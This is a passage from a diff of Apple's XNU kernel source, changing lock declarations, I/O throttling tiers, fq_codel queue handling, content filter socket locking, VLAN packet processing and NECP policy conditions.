a/bsd/miscfs/nullfs/nullfs.h b/bsd/miscfs/nullfs/nullfs.h index 4dd8d50f6..0ed22771f 100644 --- a/bsd/miscfs/nullfs/nullfs.h +++ b/bsd/miscfs/nullfs/nullfs.h @@ -139,8 +139,8 @@ struct vnodeop_desc_fake { __BEGIN_DECLS int nullfs_init(struct vfsconf * vfsp); -int nullfs_init_lck(lck_mtx_t * lck); -int nullfs_destroy_lck(lck_mtx_t * lck); +void nullfs_init_lck(lck_mtx_t * lck); +void nullfs_destroy_lck(lck_mtx_t * lck); int 
nullfs_uninit(void); int null_nodeget( struct mount * mp, struct vnode * lowervp, struct vnode * dvp, struct vnode ** vpp, struct componentname * cnp, int root); diff --git a/bsd/miscfs/routefs/routefs_ops.c b/bsd/miscfs/routefs/routefs_ops.c index 42e082203..a4f8fc170 100644 --- a/bsd/miscfs/routefs/routefs_ops.c +++ b/bsd/miscfs/routefs/routefs_ops.c @@ -65,25 +65,16 @@ static int routefserr_lookup(__unused struct vnop_lookup_args * args); static int routefserr_setlabel(__unused struct vnop_setlabel_args * args); -lck_grp_t * routefs_lck_grp; -lck_grp_attr_t * routefs_lck_grp_attr; -lck_attr_t * routefs_lck_attr; -lck_mtx_t routefs_mutex; +LCK_GRP_DECLARE(routefs_lck_grp, "routefs_lock"); +LCK_MTX_DECLARE(routefs_mutex, &routefs_lck_grp);; #define ROUTEFS_LOCK() lck_mtx_lock(&routefs_mutex) #define ROUTEFS_UNLOCK() lck_mtx_unlock(&routefs_mutex) -static int _lock_inited = 0; static boolean_t _fs_alreadyMounted = FALSE; /* atleast a mount of this filesystem is present */ static int routefs_init(__unused struct vfsconf *vfsp) { - routefs_lck_grp_attr = lck_grp_attr_alloc_init(); - routefs_lck_grp = lck_grp_alloc_init("routefs_lock", routefs_lck_grp_attr); - routefs_lck_attr = lck_attr_alloc_init(); - lck_mtx_init(&routefs_mutex, routefs_lck_grp, routefs_lck_attr); - _lock_inited = 1; - return 0; } diff --git a/bsd/miscfs/specfs/spec_vnops.c b/bsd/miscfs/specfs/spec_vnops.c index eaa194215..cb15e0146 100644 --- a/bsd/miscfs/specfs/spec_vnops.c +++ b/bsd/miscfs/specfs/spec_vnops.c @@ -100,6 +100,10 @@ #include #include +#if CONFIG_IO_COMPRESSION_STATS +#include +#endif /* CONFIG_IO_COMPRESSION_STATS */ + /* XXX following three prototypes should be in a header file somewhere */ extern dev_t chrtoblk(dev_t dev); extern boolean_t iskmemdev(dev_t dev); @@ -943,9 +947,7 @@ SYSCTL_INT(_debug, OID_AUTO, lowpri_throttle_tier3_io_period_ssd_msecs, CTLFLAG_ SYSCTL_INT(_debug, OID_AUTO, lowpri_throttle_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &lowpri_throttle_enabled, 0, ""); 
-static lck_grp_t *throttle_lock_grp; -static lck_attr_t *throttle_lock_attr; -static lck_grp_attr_t *throttle_lock_grp_attr; +static LCK_GRP_DECLARE(throttle_lock_grp, "throttle I/O"); /* @@ -997,7 +999,7 @@ throttle_info_rel(struct _throttle_io_info_t *info) if ((info->throttle_refcnt == 0) && (info->throttle_alloc)) { DEBUG_ALLOC_THROTTLE_INFO("Freeing info = %p\n", info); - lck_mtx_destroy(&info->throttle_lock, throttle_lock_grp); + lck_mtx_destroy(&info->throttle_lock, &throttle_lock_grp); FREE(info, M_TEMP); } return oldValue; @@ -1412,24 +1414,14 @@ throttle_init(void) #if CONFIG_IOSCHED int iosched; #endif - /* - * allocate lock group attribute and group - */ - throttle_lock_grp_attr = lck_grp_attr_alloc_init(); - throttle_lock_grp = lck_grp_alloc_init("throttle I/O", throttle_lock_grp_attr); /* Update throttle parameters based on device tree configuration */ throttle_init_throttle_window(); - /* - * allocate the lock attribute - */ - throttle_lock_attr = lck_attr_alloc_init(); - for (i = 0; i < LOWPRI_MAX_NUM_DEV; i++) { info = &_throttle_io_info[i]; - lck_mtx_init(&info->throttle_lock, throttle_lock_grp, throttle_lock_attr); + lck_mtx_init(&info->throttle_lock, &throttle_lock_grp, LCK_ATTR_NULL); info->throttle_timer_call = thread_call_allocate((thread_call_func_t)throttle_timer, (thread_call_param_t)info); for (level = 0; level <= THROTTLE_LEVEL_END; level++) { @@ -1547,7 +1539,7 @@ throttle_info_create(void) DEBUG_ALLOC_THROTTLE_INFO("Creating info = %p\n", info, info ); info->throttle_alloc = TRUE; - lck_mtx_init(&info->throttle_lock, throttle_lock_grp, throttle_lock_attr); + lck_mtx_init(&info->throttle_lock, &throttle_lock_grp, LCK_ATTR_NULL); info->throttle_timer_call = thread_call_allocate((thread_call_func_t)throttle_timer, (thread_call_param_t)info); for (level = 0; level <= THROTTLE_LEVEL_END; level++) { @@ -2127,6 +2119,12 @@ throttle_get_thread_effective_io_policy() return proc_get_effective_thread_policy(current_thread(), TASK_POLICY_IO); } 
+int +throttle_thread_io_tier_above_metadata(void) +{ + return throttle_get_thread_effective_io_policy() < IOSCHED_METADATA_TIER; +} + void throttle_info_reset_window(uthread_t ut) { @@ -2515,20 +2513,27 @@ spec_strategy(struct vnop_strategy_args *ap) #if CONFIG_IOSCHED /* - * For I/O Scheduling, we currently do not have a way to track and expedite metadata I/Os. - * To ensure we dont get into priority inversions due to metadata I/Os, we use the following rules: - * For metadata reads, ceil all I/Os to IOSCHED_METADATA_TIER & mark them passive if the I/O tier was upgraded - * For metadata writes, unconditionally mark them as IOSCHED_METADATA_TIER and passive + * For metadata reads, ceil the I/O tier to IOSCHED_METADATA_EXPEDITED_TIER if they are expedited, otherwise + * ceil it to IOSCHED_METADATA_TIER. Mark them passive if the I/O tier was upgraded. + * For metadata writes, set the I/O tier to IOSCHED_METADATA_EXPEDITED_TIER if they are expedited. Otherwise + * set it to IOSCHED_METADATA_TIER. In addition, mark them as passive. 
*/ if (bap->ba_flags & BA_META) { if ((mp && (mp->mnt_ioflags & MNT_IOFLAGS_IOSCHED_SUPPORTED)) || (bap->ba_flags & BA_IO_SCHEDULED)) { if (bp->b_flags & B_READ) { - if (io_tier > IOSCHED_METADATA_TIER) { + if ((bap->ba_flags & BA_EXPEDITED_META_IO) && (io_tier > IOSCHED_METADATA_EXPEDITED_TIER)) { + io_tier = IOSCHED_METADATA_EXPEDITED_TIER; + passive = 1; + } else if (io_tier > IOSCHED_METADATA_TIER) { io_tier = IOSCHED_METADATA_TIER; passive = 1; } } else { - io_tier = IOSCHED_METADATA_TIER; + if (bap->ba_flags & BA_EXPEDITED_META_IO) { + io_tier = IOSCHED_METADATA_EXPEDITED_TIER; + } else { + io_tier = IOSCHED_METADATA_TIER; + } passive = 1; } } @@ -2591,6 +2596,9 @@ spec_strategy(struct vnop_strategy_args *ap) buf_kernel_addrperm_addr(bp), bdev, buf_blkno(bp), buf_count(bp), 0); } +#if CONFIG_IO_COMPRESSION_STATS + io_compression_stats(bp); +#endif /* CONFIG_IO_COMPRESSION_STATS */ thread_update_io_stats(current_thread(), buf_count(bp), code); if (mp != NULL) { diff --git a/bsd/net/classq/classq.h b/bsd/net/classq/classq.h index 1ec52efea..a3cd15205 100644 --- a/bsd/net/classq/classq.h +++ b/bsd/net/classq/classq.h @@ -93,6 +93,11 @@ typedef struct classq_pkt { #define CLASSQ_PKT_INITIALIZER(_p) \ (classq_pkt_t){ .cp_mbuf = NULL, .cp_ptype = QP_INVALID } +#define CLASSQ_PKT_INIT(_p) do { \ + (_p)->cp_ptype = QP_INVALID; \ + (_p)->cp_mbuf = NULL; \ +} while (0) + #define CLASSQ_PKT_INIT_MBUF(_p, _m) do { \ (_p)->cp_ptype = QP_MBUF; \ (_p)->cp_mbuf = (_m); \ @@ -183,6 +188,9 @@ typedef struct _class_queue_ { #define CLASSQF_ECN (CLASSQF_ECN4 | CLASSQF_ECN6) extern u_int32_t classq_verbose; +#if DEBUG || DEVELOPMENT +extern uint16_t fq_codel_quantum; +#endif /* DEBUG || DEVELOPMENT */ SYSCTL_DECL(_net_classq); diff --git a/bsd/net/classq/classq_fq_codel.c b/bsd/net/classq/classq_fq_codel.c index f587e7689..e78ceefdf 100644 --- a/bsd/net/classq/classq_fq_codel.c +++ b/bsd/net/classq/classq_fq_codel.c @@ -97,12 +97,16 @@ fq_alloc(classq_pkt_type_t ptype) if (ptype 
== QP_MBUF) { MBUFQ_INIT(&fq->fq_mbufq); } + CLASSQ_PKT_INIT(&fq->fq_dq_head); + CLASSQ_PKT_INIT(&fq->fq_dq_tail); + fq->fq_in_dqlist = false; return fq; } void fq_destroy(fq_t *fq) { + VERIFY(fq->fq_flags & FQF_DESTROYED); VERIFY(fq_empty(fq)); VERIFY(!(fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW))); VERIFY(fq->fq_bytes == 0); @@ -127,6 +131,10 @@ fq_detect_dequeue_stall(fq_if_t *fqs, fq_t *flowq, fq_if_classq_t *fq_cl, */ FQ_SET_DELAY_HIGH(flowq); fq_cl->fcl_stat.fcl_dequeue_stall++; + os_log_error(OS_LOG_DEFAULT, "%s: dequeue stall num: %d, " + "scidx: %d, flow: 0x%x, iface: %s", __func__, + fq_cl->fcl_stat.fcl_dequeue_stall, flowq->fq_sc_index, + flowq->fq_flowhash, if_name(fqs->fqs_ifq->ifcq_ifp)); } } @@ -314,8 +322,7 @@ fq_addq(fq_if_t *fqs, pktsched_pkt_t *pkt, fq_if_classq_t *fq_cl) /* Set the return code correctly */ if (__improbable(fc_adv == 1 && droptype != DTYPE_FORCED)) { - if (fq_if_add_fcentry(fqs, pkt, pkt_flowid, pkt_flowsrc, - fq_cl)) { + if (fq_if_add_fcentry(fqs, pkt, pkt_flowsrc, fq, fq_cl)) { fq->fq_flags |= FQF_FLOWCTL_ON; /* deliver flow control advisory error */ if (droptype == DTYPE_NODROP) { @@ -375,7 +382,7 @@ fq_addq(fq_if_t *fqs, pktsched_pkt_t *pkt, fq_if_classq_t *fq_cl) */ if (fq_empty(fq) && !(fq->fq_flags & (FQF_NEW_FLOW | FQF_OLD_FLOW))) { - fq_if_destroy_flow(fqs, fq_cl, fq); + fq_if_destroy_flow(fqs, fq_cl, fq, true); fq = NULL; } } else { @@ -509,6 +516,11 @@ fq_getq_flow(fq_if_t *fqs, fq_t *fq, pktsched_pkt_t *pkt) if (fq->fq_min_qdelay > fqs->fqs_target_qdelay) { if (!FQ_IS_DELAYHIGH(fq)) { FQ_SET_DELAY_HIGH(fq); + os_log_error(OS_LOG_DEFAULT, + "%s: high delay idx: %d, %llu, flow: 0x%x, " + "iface: %s", __func__, fq->fq_sc_index, + fq->fq_min_qdelay, fq->fq_flowhash, + if_name(fqs->fqs_ifq->ifcq_ifp)); } } else { FQ_CLEAR_DELAY_HIGH(fq); diff --git a/bsd/net/classq/classq_fq_codel.h b/bsd/net/classq/classq_fq_codel.h index b8c4d10be..e2f0114f1 100644 --- a/bsd/net/classq/classq_fq_codel.h +++ 
b/bsd/net/classq/classq_fq_codel.h @@ -57,9 +57,10 @@ typedef struct flowq { #define FQF_NEW_FLOW 0x04 /* Currently on new flows queue */ #define FQF_OLD_FLOW 0x08 /* Currently on old flows queue */ #define FQF_FLOWCTL_ON 0x10 /* Currently flow controlled */ +#define FQF_DESTROYED 0x80 /* flowq destroyed */ uint8_t fq_flags; /* flags */ uint8_t fq_sc_index; /* service_class index */ - int16_t fq_deficit; /* Deficit for scheduling */ + int32_t fq_deficit; /* Deficit for scheduling */ uint32_t fq_bytes; /* Number of bytes in the queue */ uint64_t fq_min_qdelay; /* min queue delay for Codel */ uint64_t fq_updatetime; /* next update interval */ @@ -68,6 +69,11 @@ typedef struct flowq { STAILQ_ENTRY(flowq) fq_actlink; /* for new/old flow queues */ uint32_t fq_flowhash; /* Flow hash */ classq_pkt_type_t fq_ptype; /* Packet type */ + /* temporary packet queue for dequeued packets */ + classq_pkt_t fq_dq_head; + classq_pkt_t fq_dq_tail; + STAILQ_ENTRY(flowq) fq_dqlink; /* entry on dequeue flow list */ + bool fq_in_dqlist; } fq_t; #define fq_mbufq __fq_pktq_u.__mbufq diff --git a/bsd/net/classq/classq_subr.c b/bsd/net/classq/classq_subr.c index d18e9c767..d35cf2fa0 100644 --- a/bsd/net/classq/classq_subr.c +++ b/bsd/net/classq/classq_subr.c @@ -64,13 +64,29 @@ SYSCTL_QUAD(_net_classq, OID_AUTO, update_interval, CTLFLAG_RW | CTLFLAG_LOCKED, &ifclassq_update_interval, "update interval in nanoseconds"); +#if DEBUG || DEVELOPMENT +uint32_t ifclassq_flow_control_adv = 1; /* flow control advisory */ +SYSCTL_UINT(_net_classq, OID_AUTO, flow_control_adv, + CTLFLAG_RW | CTLFLAG_LOCKED, &ifclassq_flow_control_adv, 1, + "enable/disable flow control advisory"); + +uint16_t fq_codel_quantum = 0; +#endif /* DEBUG || DEVELOPMENT */ + void classq_init(void) { _CASSERT(MBUF_TC_BE == 0); _CASSERT(MBUF_SC_BE == 0); _CASSERT(IFCQ_SC_MAX == MBUF_SC_MAX_CLASSES); - +#if DEBUG || DEVELOPMENT + PE_parse_boot_argn("fq_codel_quantum", &fq_codel_quantum, + sizeof(fq_codel_quantum)); + 
PE_parse_boot_argn("ifclassq_target_qdelay", &ifclassq_target_qdelay, + sizeof(ifclassq_target_qdelay)); + PE_parse_boot_argn("ifclassq_update_interval", + &ifclassq_update_interval, sizeof(ifclassq_update_interval)); +#endif /* DEBUG || DEVELOPMENT */ fq_codel_init(); } diff --git a/bsd/net/classq/if_classq.h b/bsd/net/classq/if_classq.h index 15e6b6bb4..51f7993da 100644 --- a/bsd/net/classq/if_classq.h +++ b/bsd/net/classq/if_classq.h @@ -100,6 +100,10 @@ struct ifclassq; enum cqdq_op; enum cqrq; +#if DEBUG || DEVELOPMENT +extern uint32_t ifclassq_flow_control_adv; +#endif /* DEBUG || DEVELOPMENT */ + typedef int (*ifclassq_enq_func)(struct ifclassq *, classq_pkt_t *, boolean_t *); typedef void (*ifclassq_deq_func)(struct ifclassq *, classq_pkt_t *); diff --git a/bsd/net/content_filter.c b/bsd/net/content_filter.c index 7617e7757..e33a2a408 100644 --- a/bsd/net/content_filter.c +++ b/bsd/net/content_filter.c @@ -1605,45 +1605,39 @@ cfil_sock_id_from_socket(struct socket *so) } } -static bool -cfil_socket_safe_lock(struct inpcb *inp) -{ - if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) != WNT_STOPUSING) { - socket_lock(inp->inp_socket, 1); - if (in_pcb_checkstate(inp, WNT_RELEASE, 1) != WNT_STOPUSING) { - return true; - } - socket_unlock(inp->inp_socket, 1); - } - return false; -} - /* - * cfil_socket_safe_lock_rip - - * This routine attempts to lock the rip socket safely. - * The passed in ripcbinfo is assumed to be locked and must be unlocked (regardless - * of success/failure) before calling socket_unlock(). This is to avoid double - * locking since rip_unlock() will lock ripcbinfo if it needs to dispose inpcb when + * cfil_socket_safe_lock - + * This routine attempts to lock the socket safely. + * + * The passed in pcbinfo is assumed to be locked and must be unlocked once the + * inp state is safeguarded and before we attempt to lock/unlock the socket. 
+ * This is to prevent getting blocked by socket_lock() while holding the pcbinfo + * lock, avoiding potential deadlock with other processes contending for the same + * resources. This is also to avoid double locking the pcbinfo for rip sockets + * since rip_unlock() will lock ripcbinfo if it needs to dispose inpcb when * so_usecount is 0. */ static bool -cfil_socket_safe_lock_rip(struct inpcb *inp, struct inpcbinfo *pcbinfo) +cfil_socket_safe_lock(struct inpcb *inp, struct inpcbinfo *pcbinfo) { struct socket *so = NULL; VERIFY(pcbinfo != NULL); if (in_pcb_checkstate(inp, WNT_ACQUIRE, 0) != WNT_STOPUSING) { + // Safeguarded the inp state, unlock pcbinfo before locking socket. + lck_rw_done(pcbinfo->ipi_lock); + so = inp->inp_socket; socket_lock(so, 1); if (in_pcb_checkstate(inp, WNT_RELEASE, 1) != WNT_STOPUSING) { - lck_rw_done(pcbinfo->ipi_lock); return true; } + } else { + // Failed to safeguard the inp state, unlock pcbinfo and abort. + lck_rw_done(pcbinfo->ipi_lock); } - lck_rw_done(pcbinfo->ipi_lock); - if (so) { socket_unlock(so, 1); } @@ -1675,10 +1669,11 @@ cfil_socket_from_sock_id(cfil_sock_id_t cfil_sock_id, bool udp_only) inp->inp_flowhash == flowhash && (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt && inp->inp_socket->so_cfil != NULL) { - if (cfil_socket_safe_lock(inp)) { + if (cfil_socket_safe_lock(inp, pcbinfo)) { so = inp->inp_socket; } - break; + /* pcbinfo is already unlocked, we are done. */ + goto done; } } lck_rw_done(pcbinfo->ipi_lock); @@ -1695,10 +1690,11 @@ find_udp: inp->inp_socket != NULL && inp->inp_socket->so_cfil_db != NULL && (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt) { - if (cfil_socket_safe_lock(inp)) { + if (cfil_socket_safe_lock(inp, pcbinfo)) { so = inp->inp_socket; } - break; + /* pcbinfo is already unlocked, we are done.
*/ + goto done; } } lck_rw_done(pcbinfo->ipi_lock); @@ -1713,7 +1709,7 @@ find_udp: inp->inp_socket != NULL && inp->inp_socket->so_cfil_db != NULL && (inp->inp_socket->so_gencnt & 0x0ffffffff) == gencnt) { - if (cfil_socket_safe_lock_rip(inp, pcbinfo)) { + if (cfil_socket_safe_lock(inp, pcbinfo)) { so = inp->inp_socket; } /* pcbinfo is already unlocked, we are done. */ @@ -1746,10 +1742,11 @@ cfil_socket_from_client_uuid(uuid_t necp_client_uuid, bool *cfil_attached) inp->inp_socket != NULL && uuid_compare(inp->necp_client_uuid, necp_client_uuid) == 0) { *cfil_attached = (inp->inp_socket->so_cfil != NULL); - if (cfil_socket_safe_lock(inp)) { + if (cfil_socket_safe_lock(inp, pcbinfo)) { so = inp->inp_socket; } - break; + /* pcbinfo is already unlocked, we are done. */ + goto done; } } lck_rw_done(pcbinfo->ipi_lock); @@ -1764,10 +1761,11 @@ cfil_socket_from_client_uuid(uuid_t necp_client_uuid, bool *cfil_attached) inp->inp_socket != NULL && uuid_compare(inp->necp_client_uuid, necp_client_uuid) == 0) { *cfil_attached = (inp->inp_socket->so_cfil_db != NULL); - if (cfil_socket_safe_lock(inp)) { + if (cfil_socket_safe_lock(inp, pcbinfo)) { so = inp->inp_socket; } - break; + /* pcbinfo is already unlocked, we are done. 
*/ + goto done; } } lck_rw_done(pcbinfo->ipi_lock); @@ -4265,6 +4263,7 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3 struct cfil_entry *entry; struct cfe_buf *entrybuf; struct cfil_queue *pending_q; + struct cfil_entry *iter_entry = NULL; CFIL_LOG(LOG_INFO, "so %llx kcunit %u outgoing %d", (uint64_t)VM_KERNEL_ADDRPERM(so), kcunit, outgoing); @@ -4282,13 +4281,25 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3 passlen = entrybuf->cfe_pass_offset - pending_q->q_start; + if (cfil_queue_empty(pending_q)) { + for (iter_entry = SLIST_NEXT(entry, cfe_order_link); + iter_entry != NULL; + iter_entry = SLIST_NEXT(iter_entry, cfe_order_link)) { + error = cfil_data_service_ctl_q(so, cfil_info, CFI_ENTRY_KCUNIT(cfil_info, iter_entry), outgoing); + /* 0 means passed so we can continue */ + if (error != 0) { + break; + } + } + goto done; + } + /* * Locate the chunks of data that we can pass to the next filter * A data chunk must be on mbuf boundaries */ curlen = 0; while ((data = cfil_queue_first(pending_q)) != NULL) { - struct cfil_entry *iter_entry; datalen = cfil_data_length(data, NULL, NULL); #if DATA_DEBUG @@ -4334,6 +4345,7 @@ cfil_service_pending_queue(struct socket *so, struct cfil_info *cfil_info, uint3 } } +done: CFIL_INFO_VERIFY(cfil_info); return error; @@ -7194,6 +7206,13 @@ cfil_info_udp_expire(void *v, wait_result_t w) cfil_info_log(LOG_ERR, cfil_info, "CFIL: LIFECYCLE: GC CLEAN UP"); #endif + for (int kcunit = 1; kcunit <= MAX_CONTENT_FILTER; kcunit++) { + /* Let the filters know of the closing */ + if (cfil_dispatch_closed_event(so, cfil_info, kcunit) != 0) { + goto unlock; + } + } + cfil_db_delete_entry(db, hash_entry); CFIL_INFO_FREE(cfil_info); OSIncrementAtomic(&cfil_stats.cfs_sock_detached); diff --git a/bsd/net/dlil.c b/bsd/net/dlil.c index b58785c17..da376cb11 100644 --- a/bsd/net/dlil.c +++ b/bsd/net/dlil.c @@ -4838,7 +4838,19 @@ skip_clat: } goto next; } - if ((m->m_flags & 
M_PROMISC) != 0) { + /* + * A VLAN interface receives VLAN-tagged packets by attaching + * its PF_VLAN protocol to a parent interface. When a VLAN + * interface is a member of a bridge, the parent interface + * receives VLAN-tagged M_PROMISC packets. A VLAN-tagged + * M_PROMISC packet must be processed by the VLAN protocol + * so that it can be sent up the stack via + * dlil_input_packet_list(). That allows the bridge interface's + * input filter, attached to the VLAN interface, to process + * the packet. + */ + if (protocol_family != PF_VLAN && + (m->m_flags & M_PROMISC) != 0) { m_freem(m); goto next; } @@ -5319,8 +5331,7 @@ preout_again: if ((raw != 0) && (ifp->if_family == IFNET_FAMILY_ETHERNET)) { uint8_t vlan_encap_len = 0; - if ((old_proto_family == PF_VLAN) && - ((m->m_pkthdr.csum_flags & CSUM_VLAN_TAG_VALID) == 0)) { + if ((m->m_pkthdr.csum_flags & CSUM_VLAN_ENCAP_PRESENT) != 0) { vlan_encap_len = ETHER_VLAN_ENCAP_LEN; } m->m_pkthdr.pkt_hdr = mtod(m, char *) + ETHER_HDR_LEN + vlan_encap_len; diff --git a/bsd/net/if_vlan.c b/bsd/net/if_vlan.c index 7cba0957a..5001ef7d0 100644 --- a/bsd/net/if_vlan.c +++ b/bsd/net/if_vlan.c @@ -1137,6 +1137,7 @@ vlan_output(struct ifnet * ifp, struct mbuf * m) m->m_pkthdr.csum_tx_start += ETHER_VLAN_ENCAP_LEN; m->m_pkthdr.csum_tx_stuff += ETHER_VLAN_ENCAP_LEN; } + m->m_pkthdr.csum_flags |= CSUM_VLAN_ENCAP_PRESENT; } err = dlil_output(p, PF_VLAN, m, NULL, NULL, 1, &adv); diff --git a/bsd/net/kext_net.h b/bsd/net/kext_net.h index c8a364c86..9914747df 100644 --- a/bsd/net/kext_net.h +++ b/bsd/net/kext_net.h @@ -49,7 +49,6 @@ struct sockopt; struct inpcb; /* Private, internal implementation functions */ -extern void sflt_init(void); extern int sflt_permission_check(struct inpcb *inp); extern void sflt_initsock(struct socket *so); extern void sflt_termsock(struct socket *so); diff --git a/bsd/net/necp.c b/bsd/net/necp.c index a06dc3914..9948ac719 100644 --- a/bsd/net/necp.c +++ b/bsd/net/necp.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 
2013-2020 Apple Inc. All rights reserved. + * Copyright (c) 2013-2021 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -67,6 +67,7 @@ #include #include #include +#include #include #include #include @@ -141,16 +142,7 @@ u_int32_t necp_drop_all_order = 0; u_int32_t necp_drop_all_level = 0; -#define NECP_LOOPBACK_PASS_ALL 1 // Pass all loopback traffic -#define NECP_LOOPBACK_PASS_WITH_FILTER 2 // Pass all loopback traffic, but activate content filter and/or flow divert if applicable - -#if defined(XNU_TARGET_OS_OSX) -#define NECP_LOOPBACK_PASS_DEFAULT NECP_LOOPBACK_PASS_WITH_FILTER -#else -#define NECP_LOOPBACK_PASS_DEFAULT NECP_LOOPBACK_PASS_ALL -#endif - -u_int32_t necp_pass_loopback = NECP_LOOPBACK_PASS_DEFAULT; +u_int32_t necp_pass_loopback = NECP_LOOPBACK_PASS_ALL; u_int32_t necp_pass_keepalives = 1; // 0=Off, 1=On u_int32_t necp_pass_interpose = 1; // 0=Off, 1=On u_int32_t necp_restrict_multicast = 1; // 0=Off, 1=On @@ -251,6 +243,7 @@ ZONE_DECLARE(necp_ip_policy_zone, "necp_ip_policy", #define NECP_KERNEL_CONDITION_SIGNING_IDENTIFIER 0x10000000 #define NECP_KERNEL_CONDITION_PACKET_FILTER_TAGS 0x20000000 #define NECP_KERNEL_CONDITION_IS_LOOPBACK 0x40000000 +#define NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY 0x80000000 #define NECP_MAX_POLICY_RESULT_SIZE 512 #define NECP_MAX_ROUTE_RULES_ARRAY_SIZE 1024 @@ -301,6 +294,7 @@ static TAILQ_HEAD(_necp_session_list, necp_session) necp_session_list; struct necp_socket_info { pid_t pid; + int32_t pid_version; uid_t uid; union necp_sockaddr_union local_addr; union necp_sockaddr_union remote_addr; @@ -318,7 +312,9 @@ struct necp_socket_info { unsigned is_platform_binary : 1; unsigned used_responsible_pid : 1; unsigned is_loopback : 1; - unsigned __pad_bits : 4; + unsigned real_is_platform_binary : 1; + unsigned is_delegated : 1; + unsigned __pad_bits : 6; }; static lck_grp_attr_t *necp_kernel_policy_grp_attr = NULL; @@ -409,7 +405,7 @@ static bool 
necp_policy_mark_all_for_deletion(struct necp_session *session); static bool necp_policy_delete(struct necp_session *session, struct necp_session_policy *policy); static void necp_policy_apply_all(struct necp_session *session); -static necp_kernel_policy_id necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *domain, pid_t cond_pid, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type *cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter); +static necp_kernel_policy_id necp_kernel_socket_policy_add(necp_policy_order order, u_int32_t session_order, int session_pid, u_int32_t condition_mask, u_int32_t condition_negated_mask, necp_app_id cond_app_id, necp_app_id cond_real_app_id, char *cond_custom_entitlement, u_int32_t cond_account_id, char *domain, pid_t cond_pid, int32_t cond_pidversion, uid_t cond_uid, ifnet_t cond_bound_interface, struct necp_policy_condition_tc_range cond_traffic_class, u_int16_t cond_protocol, union necp_sockaddr_union *cond_local_start, union necp_sockaddr_union *cond_local_end, u_int8_t cond_local_prefix, union necp_sockaddr_union *cond_remote_start, union necp_sockaddr_union *cond_remote_end, u_int8_t cond_remote_prefix, struct necp_policy_condition_agent_type 
*cond_agent_type, struct necp_policy_condition_sdk_version *cond_sdk_version, u_int32_t cond_client_flags, char *cond_signing_identifier, u_int16_t cond_packet_filter_tags, necp_kernel_policy_result result, necp_kernel_policy_result_parameter result_parameter); static bool necp_kernel_socket_policy_delete(necp_kernel_policy_id policy_id); static bool necp_kernel_socket_policies_reprocess(void); static bool necp_kernel_socket_policies_update_uuid_table(void); @@ -450,6 +446,7 @@ static struct necp_uuid_id_mapping *necp_uuid_lookup_service_id_locked(uuid_t uu static struct necp_uuid_id_mapping *necp_uuid_lookup_uuid_with_service_id_locked(u_int32_t local_id); static u_int32_t necp_create_uuid_service_id_mapping(uuid_t uuid); static bool necp_remove_uuid_service_id_mapping(uuid_t uuid); +static bool necp_remove_uuid_service_id_mapping_with_service_id(u_int32_t service_id); struct necp_string_id_mapping { LIST_ENTRY(necp_string_id_mapping) chain; @@ -479,7 +476,8 @@ static bool necp_update_qos_marking(struct ifnet *ifp, u_int32_t route_rule_id); struct necp_route_rule { LIST_ENTRY(necp_route_rule) chain; u_int32_t id; - u_int32_t default_action; + u_int32_t netagent_id; + u_int8_t default_action; u_int8_t cellular_action; u_int8_t wifi_action; u_int8_t wired_action; @@ -493,6 +491,7 @@ static LIST_HEAD(necp_route_rule_list, necp_route_rule) necp_route_rules; static u_int32_t necp_create_route_rule(struct necp_route_rule_list *list, u_int8_t *route_rules_array, u_int32_t route_rules_array_size); static bool necp_remove_route_rule(struct necp_route_rule_list *list, u_int32_t route_rule_id); static bool necp_route_is_allowed(struct rtentry *route, ifnet_t interface, u_int32_t route_rule_id, u_int32_t *interface_type_denied); +static uint32_t necp_route_get_netagent(struct rtentry *route, u_int32_t route_rule_id); static struct necp_route_rule *necp_lookup_route_rule_locked(struct necp_route_rule_list *list, u_int32_t route_rule_id); static inline void 
necp_get_parent_cred_result(proc_t proc, struct necp_socket_info *info); @@ -2097,6 +2096,10 @@ necp_policy_condition_is_valid(u_int8_t *buffer, u_int32_t length, u_int8_t poli validated = TRUE; break; } + case NECP_POLICY_CONDITION_DELEGATE_IS_PLATFORM_BINARY: { + validated = TRUE; + break; + } default: { validated = FALSE; break; @@ -2139,6 +2142,11 @@ necp_policy_route_rule_is_valid(u_int8_t *buffer, u_int32_t length) validated = TRUE; break; } + case NECP_ROUTE_RULE_USE_NETAGENT: { + u_int32_t rule_length = necp_policy_condition_get_value_length_from_buffer(buffer, length); + validated = (rule_length >= sizeof(uuid_t)); + break; + } default: { validated = FALSE; break; @@ -2686,7 +2694,7 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length) num_conditions++; } if (condition_mask & NECP_KERNEL_CONDITION_PID) { - condition_tlv_length += sizeof(pid_t); + condition_tlv_length += (sizeof(pid_t) + sizeof(int32_t)); num_conditions++; } if (condition_mask & NECP_KERNEL_CONDITION_UID) { @@ -2757,6 +2765,9 @@ necp_handle_policy_dump_all(user_addr_t out_buffer, size_t out_buffer_length) if (condition_mask & NECP_KERNEL_CONDITION_IS_LOOPBACK) { num_conditions++; } + if (condition_mask & NECP_KERNEL_CONDITION_DELEGATE_IS_PLATFORM_BINARY) { + num_conditions++; + } } condition_tlv_length += num_conditions * (sizeof(u_int8_t) 